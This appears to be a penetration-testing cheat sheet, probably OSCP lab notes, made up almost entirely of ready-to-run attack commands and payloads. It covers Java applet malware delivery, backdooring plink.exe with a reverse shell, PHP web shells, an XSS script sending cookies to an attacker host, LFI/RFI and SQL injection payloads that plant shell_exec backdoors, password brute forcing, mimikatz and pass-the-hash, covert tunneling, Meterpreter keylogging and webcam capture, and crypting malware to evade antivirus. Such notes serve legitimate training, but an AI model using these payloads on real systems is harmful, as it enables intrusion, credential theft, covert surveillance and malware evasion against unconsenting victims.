echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"><param name="1" value="http://$ip:80/evil.exe"></applet>' > /var/www/html/java.html
User must hit run on the popup that occurs.
Linux Client Shells
http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
Setting up the Client Side Exploit
Swapping Out the Shellcode
Injecting a Backdoor Shell into Plink.exe
backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip -P 4444 -s reverse_shell_tcp
Web Attacks
Web Shag Web Application Vulnerability Assessment Platform
webshag-gui
Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/
Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t
Java Signed Applet Attack
HTTP / HTTPS Webserver Enumeration
OWASP Dirbuster
nikto -h $ip
Essential Iceweasel Add-ons
Cookies Manager https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Tamper Data
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Cross Site Scripting (XSS)
significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more
Browser Redirection and IFRAME Injection
<iframe SRC="http://$ip/report" height = "0" width ="0"></iframe>
Stealing Cookies and Session Information
<script>
new image().src="http://$ip/bogus.php?output="+document.cookie;
</script>
nc -nlvp 80
File Inclusion Vulnerabilities
Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code.
fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI):
https://github.com/kurobeats/fimap
Gaining a shell from phpinfo()
fimap + phpinfo() Exploit - If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.
For Local File Inclusions look for the include() function in PHP code.
include("lang/".$_COOKIE['lang']);
include($_GET['page'].".php");
LFI - Encode and Decode a file using base64
curl -s http://$ip/?page=php://filter/convert.base64-encode/resource=index | grep -e '[^\ ]\{40,\}' | base64 -d
LFI - Download file with base 64 encoding
http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php
LFI Linux Files:
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
LFI Windows Files:
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\repair\SAM
%WINDIR%\win.ini
%SYSTEMDRIVE%\boot.ini
%WINDIR%\Panther\sysprep.inf
%WINDIR%\system32\config\AppEvent.Evt
LFI OSX Files:
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf
LFI - Download passwords file
http://$ip/index.php?page=/etc/passwd
http://$ip/index.php?file=../../../../etc/passwd
LFI - Download passwords file with filter evasion
http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?>
For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files /etc/php5/cgi/php.ini - “allow_url_fopen” and “allow_url_include both set to “on”
include($_REQUEST["file"].".php");
Remote File Inclusion
http://$ip/addguestbook.php?name=a&comment=b&LANG=http://$localip/evil.txt
<?php echo shell_exec("ipconfig");?>
Database Vulnerabilities
MySQL SQL
Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password
mysql -u root -p -h $ip
use "Users"
show tables;
select * from users;
Authentication Bypass
name='wronguser' or 1=1;#
name='wronguser' or 1=1 LIMIT 1;#
Enumerating the Database
http://$ip/comment.php?id=738’
Verbose error message?
http://$ip/comment.php?id=738 order by 1
http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6
Determine MySQL Version:
http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6
current user being used for the database connection
http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6
we can enumerate database tables and column structures
http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables
target the users table in the database
http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
extract the name and password
http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users
Create a backdoor
http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
SQLMap Examples
Crawl the links
sqlmap -u http://$ip --crawl=1
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
SQLMap Search for databases against a suspected GET SQL Injection point ‘search’**
sqlmap –u http://$ip/blog/index.php?search –dbs
SQLMap dump tables from database oscommerce at GET SQL injection point ‘search’ sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps
SQLMap GET Parameter command
sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5
SQLMap Post Username parameter sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --dump-all
SQL Map OS Shell sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell
sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5 --dbms=MySQL --os-shell
Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
--file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
Scan url for union + error based injection with mysql backend
and use a random user agent + database dump
sqlmap -o -u http://$ip/index.php --forms --dbs
sqlmap -o -u "http://$ip/form/" --forms
sqlmap check form for injection
sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump
sqlmap dump and crack hashes for table users on database-name.
Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs
Enumerate tables from a specific database
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
Dump table data from a specific database and table
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2
Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1\*/param2/value2" --dbs # exploits param1
Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell
Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell
SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"
Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
Password Attacks
AES Decryption
http://aesencryption.net/
Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; done
Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict
Default Usernames and Passwords
CIRT
http://www.cirt.net/passwords
Government Security - Default Logins and Passwords for Networked Devices
http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php
Virus.org
http://www.virus.org/default-password/
Default Password
http://www.defaultpassword.com/
Brute Force
Nmap Brute forcing Scripts
https://nmap.org/nsedoc/categories/brute.html
Nmap Generic auto detect brute force attack
nmap --script brute -Pn <target.com or ip> <enter>
MySQL nmap brute force attack
nmap --script=mysql-brute $ip
Dictionary Files
Word lists on Kali
cd /usr/share/wordlists
Key-space Brute Force
crunch 6 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 8 8 -t ,@@^^%%%
Pwdump and Fgdump - Security Accounts Manager (SAM)
pwdump.exe - attempts to extract password hashes
fgdump.exe - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.
Windows Credential Editor (WCE)
allows one to perform several attacks to obtain clear text passwords and hashes
wce -w
Mimikatz
extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets
https://github.com/gentilkiwi/mimikatz From metasploit meterpreter (must have System level access): meterpreter> load mimikatz meterpreter> help mimikatz meterpreter> msv meterpreter> kerberos meterpreter> mimikatz_command -f samdump::hashes meterpreter> mimikatz_command -f sekurlsa::searchPasswords
Password Profiling
cewl can generate a password list from a web page
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
Password Mutating
John the ripper can mutate password lists
nano /etc/john/john.conf
john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
Medusa
Medusa, initiated against an htaccess protected web directory
medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
Ncrack
ncrack (from the makers of nmap) can brute force RDP
ncrack -vv --user offsec -P password-file.txt rdp://$ip
Hydra
Hydra brute force against SNMP
hydra -P password-file.txt -v $ip snmp
Hydra FTP known user and password list
hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh
Hydra SSH Against Known username on port 22 hydra $ip -s 22 ssh -l <user> -P big\_wordlist.txt
Hydra POP3 Brute Force
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
Hydra SMTP Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
Hydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
Hydra attack Windows Remote Desktop with rockyou hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
Password Hash Attacks
Online Password Cracking
https://crackstation.net/
Hashcat running on
Sample Hashes
http://openwall.info/wiki/john/sample-hashes
Identify Hashes
hash-identifier
Crask linux hashes you must first unshadow them:
unshadow passwd-file.txt shadow-file.txt
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
John the Ripper - Password Hash Cracking
john $ip.pwdump
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
john --rules --wordlist=/usr/share/wordlists/rockyou.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
JTR forced descrypt cracking with wordlist
john --format=descrypt --wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt brute force cracking
john --format=descrypt hash --show
Passing the Hash in Windows
Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:
export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U administrator //$ip cmd
Networking, Pivoting and Tunneling
Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port
apt-get install rinetd
cat /etc/rinetd.conf
# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
SSH Local Port Forwarding: supports bi-directional communication channels
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT
ssh -D <local proxy port> -p <remote port> <target>
Proxychains - Perform nmap scan within a DMZ from an external computer
Create reverse SSH tunnel from Popped machine on :2222
ssh -f -N -R 2222:$ip:22 root@$ip
Create a Dynamic application-level port forward on 8080 thru 2222
ssh -f -N -D $ip:8080 -p 2222 hax0r@$ip
Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains
proxychains nmap --top-ports=20 -sT -Pn $ip/24
HTTP Tunneling
nc -vvn $ip 8888
Traffic Encapsulation - Bypassing deep packet inspection
http_tunnel
On server side:
sudo hts -F <server_ip_addr>:<port_of_your_app> 80
On client side:
sudo htc -P <my_proxy.com:proxy_port> -F <port_of_your_app> <server_ip_addr>:80
stunnel
Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
Tunnel on port 22
plink -l root -pw pass -R 3389:$ip:3389 $ip
Port 22 blocked? Try port 80? or 443?
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P 80
Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
Windows machine add required firewall rules without prompting the user
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
Start the http tunnel client
httptunnel_client.exe
Create HTTP reverse shell by connecting to localhost port 3000
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P 3000
VLAN Hopping
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
VPN Hacking
Identify VPN servers:
./udp-protocol-scanner.pl -p ike $ip
Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt
Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
Use ike-scan to capture the PSK hash:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
PPTP Hacking
Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
Port Forwarding/Redirection
PuTTY Link tunnel - SSH Tunneling
Forward remote port to local address:
plink.exe -P 22 -l root -pw "1337" -R 445:$ip:445 $ip
SSH Pivoting
SSH pivoting from one network to another:
ssh -D $ip:1010 -p 22 user@$ip
DNS Tunneling
dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.
Attacking Machine Installation:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
Target Machine:
https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/
dnscat --host <dnscat server_ip>
The Metasploit Framework
See Metasploit Unleashed Course in the Essentials
Search for exploits using Metasploit GitHub framework source code:
https://github.com/rapid7/metasploit-framework
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startup
systemctl enable postgresql
MSF Syntax
Start metasploit
msfconsole
msfconsole -q
Show help for command
show -h
Show Auxiliary modules
show auxiliary
Use a module
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass
Show the basic information for a module
info
Show the configuration parameters for a module
show options
Set options for a module
set RHOSTS $ip-254
set THREADS 10
Run the module
run
Execute an Exploit
exploit
Search for a module
search type:auxiliary login
Metasploit Database Access
Show all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF database
db_nmap
Search machines for specific ports in MSF database
services -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)
services -p 443 --rhosts
Staged and Non-staged
Non-staged payload - is a payload that is sent in its entirety in one go
Staged - sent in two parts
Not have enough buffer space
Or need to bypass antivirus
Experimenting with Meterpreter
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shell
getuid
Search for a file
search -f *pass*.txt
Upload a file
upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a file
download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shell
shell
Exit the meterpreter shell
exit
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https_meterpreter payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/
Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
nano crossfire.rb
Post Exploitation with Metasploit
download Download a file or directory
upload Upload a file or directory
portfwd Forward a local port to a remote service
route View and modify the routing table
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
record_mic Record audio from the default microphone for X seconds
webcam_snap Take a snapshot from the specified webcam
getsystem Attempt to elevate your privilege to that of local system.
hashdump Dumps the contents of the SAM database
Meterpreter Post Exploitation Features
Create a Meterpreter background session
background
Bypassing Antivirus Software
Crypting Known Malware with Software Protectors
One such open source crypter, called Hyperion
cp /usr/share/windows-binaries/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
wine hyperion.exe ../backdoor.exe ../crypted.exe
